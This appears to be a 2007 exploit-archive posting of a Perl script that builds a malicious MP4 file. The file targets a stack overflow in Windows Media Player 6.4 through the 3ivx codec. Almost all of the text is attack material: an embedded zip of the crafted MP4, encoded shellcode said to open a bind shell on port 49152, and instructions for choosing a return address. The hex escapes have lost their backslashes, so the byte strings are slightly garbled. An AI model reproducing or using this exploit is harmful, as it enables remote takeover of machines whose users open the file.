wmp-overflow.txt
Posted on 09 December 2007
#!/bin/perl # # Windows media player 6.4 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/coral/3ivx_d4_451_win.exe # # - open the MP4 file with mplayer2.exe # # SYS 49152 # gforce(put the @ here)operamail(put the . here)com # # update: # the latest 5.0.1 codec is still vulnerable use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); $zip_data = # code 724982 "x50x4Bx03x04x14x00x00x00x08x00x56xACx3Fx36xC5". "xE1x2Ex98x9Ax0Ax00x00x5CxC2x01x00x1Ex00x00x00". "x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66". "x6Fx72x5Fx6Dx70x6Cx61x79x65x72x32x2Ex6Dx70x34". "xEDxD7x0Bx70x54xD5x19x07xF0xB3x9Bx8Dx80x10x26". "x55x21x6Ax29x46x40x4Dx7DxA4x9Bx4DxC8x83xA1x1A". "x62x72x49xD1x00x05x12x23x89x81x65x77x21xCBx66". "xB3xC9xEExE6x85x80x81x28x06x8Cx96x47x78x09xD4". "xA0xA0xC4x32x3ExA0x15x47xA7x45xC6x22xA6x2Ax56". "xADxF5xD1x8Ax15x15xA5x5Ax85x98x89x05x5FxFDx4E". "xEEx7FxDDx55x47x4Bx47xC7x8ExFAxFFxE9xC7x39xBB". "xF7xDExF3xF8xCExBDxE7x66x95x52xC9xB3xC3x4Dx35". "x45x19xE3x92x95xD0xA5xBFx26xC3xE1x0Dx05xFCxFA". "xB3xB2x74x25xF9x03x81x7AxA9x55xF9xEBx2BxDDxFA". "xABxDDx25x3Fx39xB6xA7x72xFAx21xA5xACxA5x4Ax9D". "xB7x58x59x94xFEx3FxEAx33x1FxBExF8x39x57x7Dx25". "xABx52x09x1DxE1xA0xD3x27xF5xF2xB0xAFxAFxCFx7E". "xBAxCFxDDx25xC3x2DxD1xD6xA4xDFxCFx77xF1x3FxF5". "x9Bx30xD6xEFxF6x3AxA5x92xECx77x47xE7x65xF6xB1". "x3Dx5Fx0Dx2Cx55xC5x7FxECx3BxF1xECx4Ax77x55x30". "x72x55x28x50x57xFDxB9x5Ex06xBDxE7xF7x56xCFx96". "x4Ax62xC8x6Fx36x04xA3xDCxE6xF7xC3xDCx41xCFxEC". "x98x21x0DxAAx0Bx56x25x9BxF5x41xBBx42xE1x59x55". "x52x9Fx13x0Ax87xDCx31xE7x5Cx21x8BxE0xFCxC2x34". "xACx2Ax51x17x32x3Cx2DxDDx13x72x87x74x25xAExB9". "xB9x79x84x94x36x29x4FxCBx1DxA2xACx43x95x75xEC". "x36x65xE9x7Ex2Cx5ExBExB1x9Ex92x78x92x14x16xC9". "xABx3Ax3Dx14x0Ex87xA2xCDx5AxFFx2Ax17xE9x7Ax8A". "x74xEFxFAxB4x13xB3xCBx21x28x47xEAx21x9BxF5x81". "x55x72xDExBCxE8x0CxF5xF5xAAxDFxB7x14x4FxC8x10". "x3Ex94x78x4Fx42xD7x77x4AxFCx45x62xBBx44xB3x84". "xACx91x65x09x8Ex6Dx91xB8x43xE2x5Ex89x0Dx38x77". "x9Dx84xDCxB3x16x19xBFxE5x16x89x36x89x3Bx25x24". "xCDx96xF9x12x4FxE2xF3xAFx24x36x22x9Ex95x78x59". "x62x81xC4xEFx25xCAx25x66x49xECx42x9FxB2xACx96". "x22x89xB5x12xF2x8Cx58xF6xA1x7Ex2DxEAxCBx25xEE". "x96x58x23x21xF9xB5xDCx24x51x23x51x68xF6x6Fx3D". "x59xCAx26x89xA9x12x25x68x2Bx5Dx62xA9x84x17xE7". "xD6x49x84x25x0Cx89x3Dx38xFFx25x89xD7xF0xFDxE5". "x12x73x10x41x94xF3x62x4Ax37xDAxD1xE3xBEx46xC2". "x83xF3xF4xFCx57x20x16x49xDCx2CxB1x43xE2x3AxC4". "x0Ax8CxBBx1DxB9x5Cx87xFAx6Fx70xAExCExC7xABx12". "xC7x31xC7x95x98x9Fx1Fx79x89xE4x4Ax8Fx73x31xAE". "xFDx2DxCAxDFx49xBCx2Dx71x40x62x35xC6x37x37x66". "x2Dx1Fx91x78x00xF9x0Fx62x8Dx1Ex96x98x89xF6xAB". "x91xEFx0DxC8x53x03xD6x5ExB7x7DxB5xC4x2AxE4xE9". "xEFx12xFFxC4x5Ax2ExC5x38xF4xFAx36x4Ax74x4Ax5C". "x8FxF3x57x60x0Ex95x18x87x07xD7xD7x21x87xDExCF". "xCDx4BxF6x26x4BxABx44x87xC4x36x94xFAxBAx85x38". "xBFx1Ax9Fx67x63x6CxB5x68xB3x4BxE2x6Fx18xC7x22". "xF4x1Fx42xBEx97x21x5Fx3ExACx59x10xEDx34x63xDD". "xE6xE0xBAx6Bx31x57x7Dx6Fx3FxADxCCx7Bx79x31x72". "x7Fx0Dx42x5Fx13xC6xBCx17xA0xFDxF9x68x57x1FxDF". "xAFxCCx67xE1x6DxCCx2Bx88xF3x3Dx18x73x08x7DxEB". "x3ExCBxF0xBDx5Cx2Bx1Bx8BxB9x5Ex0Bx31xBFxCAx98". "x73xCBx70x7Ex1Dx72x3Ax2Fx66xACxF3x51x5Fx8AxCF". "x7Ax9DxEFx97xB8x15x63x5Cx8DxB9xE8xF1x5Cx85x6B". "xFFx85x75x9Cx87xF5xD2xF7x4Ax40x99xCFx91x07x39". "xBDx3Ax66x7Ex3Ax97x1BxD0x57x18x39xD0xF7xD0xAB". "x38xB7x16x6BxF1x9Cx32xEFxE7x76xE4x4CxDFx23x2B". "x91xFBx46xCCxC9x17x73x4Dx13xFAxF3xE1x7Cx7DxAE". "x7Ex4Ex6Ex97xB8x51x99xF7xCEx53x98x8Fx1Ex83xDE". "x43x1Ex54xE6x33xA2xEFxB1x16x89x83x98x6Bx15x72". "x1DxC0xBCxD6x61x3Dx36x21x07x0Dx18xFBx5ExB4xF3". "x3CxD6x76x21xE6xA8xD7xBAx15xE3x8Ax3CxCFx8Fx23". "xFFx0DxC8xFFx2Cx94x7ExCCxC7x8DxB1xD7x60x6Ex01". "x44x4DxCCx5Ax5Fx89xF5x69xC0x18x9Bx50xDFx86xF1". "x2FxC7xBCx75x3BxF7x49x4CxC6xDCxDDxC8xE3x38x8C". "x77x22xD6xF8x12xE4xEAx5Ex7Cx97xA3xCCx67x44xEF". "xC3x3Fx97xB8x58xE2x1Ex89x6CxB4xAFxE7x5Fx8Cx75". "xD1x73x2Ax45x2Ex2Bx70xBEx5Ex7Bx2FxE6x96xA9xCC". "x7Bx26x13xF9xE8xC1x3Ax1BxC8x43xAExC4x74x89x11". "x18x9BxCEx67x0AxFAx5Fx8Ex7CxEAx3Dx56xDFx1Fx6B". "x90xCBxB9xB8xB6x16x39xD3xB9x99x81xEFx9Bx90x73". "xBDx6ExFAxDEx6Ax43x79x0ExD6x58xD7xFFx8Cx5CxBC". "xA3xCCx7DxBFx16xF9x7Cx04x79xD8xAAxCCx3DxCCx8D". "xBCx36xC5xACxEBx2BxC8xB9xBExC7x66xAAxE8x9Ex51". "x83x35xD4xFBx55x81x32xF7x3Bx3FxAExD3xC7x17xE1". "xBBx1BxD1x97x8Ex51xF2x9ExFCx40xCAx91xC8x81xCE". "x91x43x22x49xA2x3FxC6xE0xC1x75x37x63x9Cx8FxCA". "x73x6Dx41xFExF4x7DxA3xF7x21x7Dx4Fx2DxC1x5Ax36". "x23x27x3Ax77x01xF4xB7x18x9Fx17x22xAFxFAx39xBC". "x12x6Dx57xA2x5CxA4xA2x7Bx4Ax64x4FxBAx1Ex75x2F". "xC6x57xA9xA2xF7x9AxCExF5x24xE4x7Dx26xD6x7Ax06". "x8Ex4FxC4xE7xC8x3Ex5Ax87x5CxFAxD1x46x0BxDAxD4". "x6BxA8xDFx47x67x49xE4xA1x3DxFDx4Ex8DxC3x1CxF4". "xFDxFCx2ExF2xA3xF3xACxF7x8Ex72xB4xA7xEFx6DxBD". "xF7xBCxA8xCCxF7x53x21xDAx98x80xF9x85xB0xD6xB3". "x55x74xEFxB9x09xDFxB7xAAxE8xFEx3Dx17xB9xB9x01". "xE3xAAxC3xB1x05x98x4Fx33xF2x77x0DxAExF3xA1xAD". "xC5x2AxFAxECxEAx3DxEEx3Ax15xDDx67x1BxB1x1ExEB". "x71x5Dx0BxBExD3x7BxCFx26xACx7DxE4xEFx9Ax6Ax8C". "xABx59x45xEFx5Dx7Dx2Fx05x91x23x1Dx57x60x3Cx7E". "xC4xD5x2AxBAx2Fx35x62x8Ex01xF4x35x13xEBx73x05". "xD6xD8xA7xA2xEFx09xBFx8AxEExC9x57x61x0Ex01xCC". "xC1x83xE3xB1xF7x42x23xFAx5Fx1Cx33xF7xF9x18x4B". "x10xE3x95xE7x4Bx1DxC7x98xCAx90xBFx46xF5xE9x5E". "xA6x7Ax91x4Fx7DxFFxEAxFBx59xEFx9BxFAx5Ex5Ax83". "x6Bx22xCFxAFx0Fx63x89x3CxDFx2DxC8xEFx92x98x39". "xD6x23x77x91xB5x5Dx8Ax71x84xD0x47xE4x3Dx1DxD9". "xA3x6ExC6xF5x7Ax6Dx6ExC7xB8x17x20xD7xBAx9DxC8". "xFBx3CxF2x37x65xECxFBxB1x09xFDx96xA3xAEx73x54". "x85xF6x9Bx90xABx06xACxB9x7Cx56x1Bx43x61x57x00". "x7Fx68x8Fx94x3Fx1Dx2Ex91x78x5AxFEx9CxCAx55xD6". "x93x12x94xF5x9Cx63xCAx9Ax7Fx40x59x3Dx15xCAx7A". "x7DxABxB2x6Ex2Bx54xD6x47xADxCAxFAxC6x11x15xD7". "x6FxB3x8Ax3BxEFx80x8Ax1Bx7Fx83x8AxABx1CxABxE2". "x5AxD7xA9xB8x3Bx2Fx57x71x7FxBAx43xC5x1DxBEx50". "xD9xFAx1Dx53xB6x73xFFxADx6CxF9x0Fx2Bx9BxA7xBF". "xB2x5Dx9BxA8x6Cx9Bx8Bx95xEDxA1x6Ax65x7BxA9x5B". "xD9x3Ex2Cx54xF1x67xBExA9xE2xC7xA4xA9xF8xD2x37". "x54x7CxFDx0Ex15xDFxDExA6xE2x77x96xA8xF8xA7x5F". "x96xD7x5Bx5Cx9Dx3BxECx94x6DxF7x03xBFx27x1CxF9". "x99xF2x99xDFx49xF2xDBx2AxE8xACxA9xA9x8AxFEx56". "xB0xECx3CxECx95x9Fx0FxF2x4Ex78xA0xB3xDAxE9x97". "x72x87xDBxD9x77x71xDFxEFx9Bx49xF5x9Ex60xB8x2E". "xE8x49x73xA4x67x8CxCExCCxCAxCExB1x3Bx43xF1x56". "x8Bx71x91xC5x62x14x1AxCDxB9x86xFExAFx79x99x59". "x34x9BxC5x30xB3xB0x99xC5x40xB3xE8x2ExF8xFAx72". "x0Bx26x17x94x15xE4x5ExDAxFFx58xB8xF5xADx0BxBA". "x5Ax0ExDFxF3xC2x3Bx2Fx84x47xF5x94x2Dx0Ax9DxFA". "xC8xF4x8Dx9Bx5BxDExFAxF0x60xCFx18x7BxC3xDBxA9". "xB7xB9x2Ax72xC6x24x3Dx71x70x61xD2x6BxC7x9FxFA". "xC7x96x3Fx94x85xCEx5Fx9Ax97xF4xF1xA1xB2x86x37". "x8BxAAx93x3Ax52x7CxE5xD9x73x0Fx94x3FxBBx67x43". "xC9xF6x7DxEBx1Ax8Ax3Fx1Ax7CxFFxD2x9DxBBx93x3E". "x3Ex58xD6xB0xAFxA8xE4xB9xF3xD7x1Bx9Bx26xECxAD". "x4Fx4AxB9x73x61xF3x43xF1xBExF1x7Bx8BxCExD8x7E". "xFEx92x92xA4xA7x5Ex7Cx3FxE9x95xFDxB6x9Ex9FxB5". "x4ExABx39x9AxD3x76xBCxBBxC3x71xF7xAAxBBx2Ex7A". "x77xD5xFAxC1xAExDAxBBx56xD4x5ExF5xD1xC9xAEx86". "xF5xCFx34xEDx1BxBFxABxFDxB6x55xF6x5Fx57x0Cx75". "x14x6Cx4Bx7FxFFxB1x8AxC4x01x4Fx76xAFx1ExF0x72". "xF7x75x03x5CxB5x1Dx8ExF2xCDx1Dx03x86xE4x4Ex75". "x64x3Fx78xDFx26x39x66x6Fx3BxB2x6AxEBxE5x5DxB3". "xDExDFx51xB8x62xEBx84x6Ex5Dx1Fx79xEAx99x6Fx4A". "xFDxE8xCAxC1x5Dx15x43xBBx7Ax8CxDDx1Bx5FxEFxCD". "x69x93xFAxD8xDExBDx1Dx8Ex4Fx1Ex9FxB4xBBxF7xE8". "x2DxA1xC9x29x67xDBx9Fx4Fx19xE5x2Bx9Fx52xB5xE5". "x40x5BxF6xE9xF7x38x2Ex4BxDEx72xB2xFFx68xCFx33". "xD9x87x97x55xECx1CxEEx6AxD8x94xB0xFFxC8xDAx81". "xBDx1Dx6Bx07x76x1DxC9x59xD6x33xE8xACx19x53xBA". "x73xDAx7Ax2Bx72xFCxAExDAxA2x84x99x23xACx17xBB". "x1AxDAxA5xBFx9FxB6xCFxDFxB3x7AxEBx84x8AxA1x92". "xC4x61xDFxC0x42x7DxB3x0Cx22xA2xEFx84x5CxE3xEE". "xFDx46x89x51x6AxC4x0Fx30x5Fx93x93x8Dx32x23x3E". "xD1xACxCBx8BxF0x13xF9xA7xD0x30x5Fx9Cx85x5Fx1A". "xB6x2Fx3Bx30xD5xB0x95xBEx6Ax5Cx6Ax5CxF6x75xE2". "xD0xA1x43x27x32x95x13x3Ax89x88xBExBBx0AxB5xFF". "xF7x20x88x88x88x88x88xE8x7BxA9x98x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88xE8x87". "xA0x94x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88". "x88x88x88x88x88x88x88x88xBEx57x8Ax89x88x88x88". "x88x88x88x88x88x88x88x88x88x88x88x88x88x88x7E". "x38x66x12x11x11x11x11x11x11x11xD1x7Fx51x40xDF". "x9Ex34xA5xD4xB9x9DxE3xA6x4Cx93x72xB8xDBx19x76". "x4Ax69x91x50x93xBDxF3xE6x79x5DxCEx70x20xD9xF0". "xD6x7BxE4x8BxE4x4Ex67xD5x2Cx29x4Fx8Fx3Dx6Bx52". "xBDx27xE8x0Ex84xF4xF1x33xE7x54x07x75x79x0Ax8E". "x9Bx06xEBx2BxC3x41x5Fx75xCCx95x11x16x95xD0x57". "x0Ex77x7Bx43x3Ex29x87x7ExE1xB8xEEx63x58xA7xDB". "xD9x24xE5x69xB1xFDx3AxECx76xBBx14x67xB8x6AxBC". "x55x52xFEx08xC7x86x44x2ExCDxE9x0Cx07x02x52xA6". "xC5x5ExE4x9Dx56x57xEDx09x25xD7x67xA4x66xA5xA6". "xA5xA6xDBx2Fx4CxFEx65x9DxD7xE5x9BxE6xF5x7Bx92". "x33x53x47xA7x3AxE4x9Cx5Bx2Fx12xBAx57xBFxC7xA9". "xC7xACx5Cx01x7FxAAxB3xA6xA6xCAx93x6Ax5ExAEx47". "x52xEDxF4x7Bx22x0Dx4Ex9Cx34xA5x48xAAx73x63x3B". "x4AxB6xF7xC9xCAxF8x6Cx25x2DxD3x9Ex6Ex7Ex93x53". "x60x37x2BxD9x19x38x27xCBxEExE8xABxA4x8FxCEx33". "xCCx4Ax5Ax96x79x4Ex9Ax23x3Dx1Fx95xD1x19xD2x78". "xD3x09x8CxF0xC7xB1x23xF4x84x66x5Cx9Ax9Fx9Fx37". "xE3x17xF9xFAxD0x98xD8x81xA6xA5x5Fx60x14xE4x67". "x66x67x39x8Cx82xBCxD1x79x0Ex23x2Fx23x2Fx7Bx5C". "x46x5Ax66x46x76x81xC3x9Ex61x64x8ExCBxBBx20xC7". "x9Ex9DxEDx90x8Ex4Fx7Ax7Dx76xD0x23x8DxFEx07x50". "x4Bx01x02x14x00x14x00x00x00x08x00x56xACx3Fx36". "xC5xE1x2Ex98x9Ax0Ax00x00x5CxC2x01x00x1Ex00x00". "x00x00x00x00x00x00x00x20x00x00x00x00x00x00x00". "x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66". "x6Fx72x5Fx6Dx70x6Cx61x79x65x72x32x2Ex6Dx70x34". "x50x4Bx05x06x00x00x00x00x01x00x01x00x4Cx00x00". "x00xD6x0Ax00x00x00x00"; my $shellcode = # code 724982 "x2BxC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13". "xC6x5Ax9CxA1x83xEBxFCxE2xF4x3Ax30x77xECx2ExA3". "x63x5Ex39x3Ax17xCDxE2x7Ex17xE4xFAxD1xE0xA4xBE". "x5Bx73x2Ax89x42x17xFExE6x5Bx77xE8x4Dx6Ex17xA0". "x28x6Bx5Cx38x6AxDEx5CxD5xC1x9Bx56xACxC7x98x77". "x55xFDx0ExB8x89xB3xBFx17xFExE2x5Bx77xC7x4Dx56". "xD7x2Ax99x46x9Dx4AxC5x76x17x28xAAx7Ex80xC0x05". "x6Bx47xC5x4Dx19xACx2Ax86x56x17xD1xDAxF7x17xE1". "xCEx04xF4x2Fx88x54x70xF1x39x8CxFAxF2xA0x32xAF". "x93xAEx2DxEFx93x99x0Ex63x71xAEx91x71x5DxFDx0A". "x63x77x99xD3x79xC7x47xB7x94xA3x93x30x9Ex5Ex16". "x32x45xA8x33xF7xCBx5Ex10x09xCFxF2x95x09xDFxF2". "x85x09x63x71xA0x32x5CxA1xA0x09x15x40x53x32x38". "xBBxB6x9DxCBx5Ex10x30x8CxF0x93xA5x4CxC9x62xF7". "xB2x48x91xA5x4AxF2x93xA5x4CxC9x23x13x1AxE8x91". "xA5x4AxF1x92x0ExC9x5Ex16xC9xF4x46xBFx9CxE5xF6". "x39x8CxC9x5Ex16x3CxF6xC5xA0x32xFFxCCx4FxBFxF6". "xF1x9Fx73x50x28x21x30xD8x28x24x6Bx5Cx52x6CxA4". "xDEx8Cx38x18xB0x32x4Bx20xA4x0Ax6DxF1xF4xD3x38". "xE9x8Ax5ExB3x1Ex63x77x9Dx0DxCExF0x97x0BxF6xA0". "x97x0BxC9xF0x39x8AxF4x0Cx1Fx5Fx52xF2x39x8CxF6". "x5Ex39x6Dx63x71x4Dx0Dx60x22x02x3Ex63x77x94xA5". "x4CxC9x29x94x7CxC1x95xA5x4Ax5Ex16x5Ax9CxA1"; open(code, ">tempzip.zip") || die "Can't Write temporary File "; binmode (code); print code $zip_data; close (code); print " Temporary file ready, patching.. "; my $zip = Archive::Zip->new(); $zip->read( 'tempzip.zip' ) ; $zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' ); open(code, "+<SYS_49152_MP4_for_mplayer2.mp4") || die "Can't Open temporary File "; binmode (code); seek code,3875,0; print code $shellcode; print " Shellcode added.. "; seek code,5566,0; print " Chose a good return address: The right way would be to attach a debugger to mplayer2.exe "; print "and find the address of the pop edi, pop esi, retn sequence inside 3ivx.dll, "; print "to get the second byte, but usually a value between 0xC6, 0xED or 0xCE should work.. "; print code chr(hex($a=<STDIN>)); print " Address added, have fun! "; close (code); #indeed this sploit could have been written better without the ret address hassle, #but it's intended to be only a POC, not a weapon for kiddies..